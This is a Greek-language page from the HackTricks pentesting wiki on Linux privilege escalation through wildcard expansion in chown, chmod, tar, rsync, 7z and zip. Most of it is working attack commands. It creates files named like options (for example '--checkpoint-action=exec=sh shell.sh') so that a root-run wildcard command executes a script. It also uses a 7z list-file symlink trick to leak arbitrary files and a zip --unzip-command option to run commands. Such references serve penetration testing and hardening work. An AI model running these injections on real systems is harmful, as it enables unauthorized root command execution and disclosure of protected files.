hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md

6.1 KiB
Raw Permalink Blame History

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

chown, chmod

Μπορείτε να υποδείξετε ποιον ιδιοκτήτη αρχείου και ποιες άδειες θέλετε να αντιγράψετε για τα υπόλοιπα αρχεία

touch "--reference=/my/own/path/filename"

Μπορείτε να εκμεταλλευτείτε αυτό χρησιμοποιώντας https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (συνδυασμένη επίθεση)
Περισσότερες πληροφορίες στο https://www.exploit-db.com/papers/33930

Tar

Εκτέλεση αυθαίρετων εντολών:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Μπορείτε να εκμεταλλευτείτε αυτό χρησιμοποιώντας https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack)
Περισσότερες πληροφορίες στο https://www.exploit-db.com/papers/33930

Rsync

Εκτέλεση αυθαίρετων εντολών:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Μπορείτε να εκμεταλλευτείτε αυτό χρησιμοποιώντας https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack)
Περισσότερες πληροφορίες στο https://www.exploit-db.com/papers/33930

7z

Στο 7z ακόμη και χρησιμοποιώντας -- πριν από * (σημειώστε ότι το -- σημαίνει ότι η επόμενη είσοδος δεν μπορεί να θεωρηθεί ως παράμετροι, οπότε μόνο διαδρομές αρχείων σε αυτή την περίπτωση) μπορείτε να προκαλέσετε ένα αυθαίρετο σφάλμα για να διαβάσετε ένα αρχείο, οπότε αν μια εντολή όπως η παρακάτω εκτελείται από τον root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Και μπορείτε να δημιουργήσετε αρχεία στον φάκελο όπου εκτελείται αυτό, θα μπορούσατε να δημιουργήσετε το αρχείο @root.txt και το αρχείο root.txt που είναι ένα symlink στο αρχείο που θέλετε να διαβάσετε:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Τότε, όταν εκτελείται το 7z, θα θεωρήσει το root.txt ως ένα αρχείο που περιέχει τη λίστα των αρχείων που πρέπει να συμπιέσει (αυτό υποδεικνύει η ύπαρξη του @root.txt) και όταν το 7z διαβάσει το root.txt, θα διαβάσει το /file/you/want/to/read και καθώς το περιεχόμενο αυτού του αρχείου δεν είναι μια λίστα αρχείων, θα εμφανίσει ένα σφάλμα δείχνοντας το περιεχόμενο.

Περισσότερες πληροφορίες στις αναφορές της CTF από το HackTheBox.

Zip

Εκτέλεση αυθαίρετων εντολών:

zip name.zip files -T --unzip-command "sh -c whoami"

{% hint style="success" %} Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks
{% endhint %}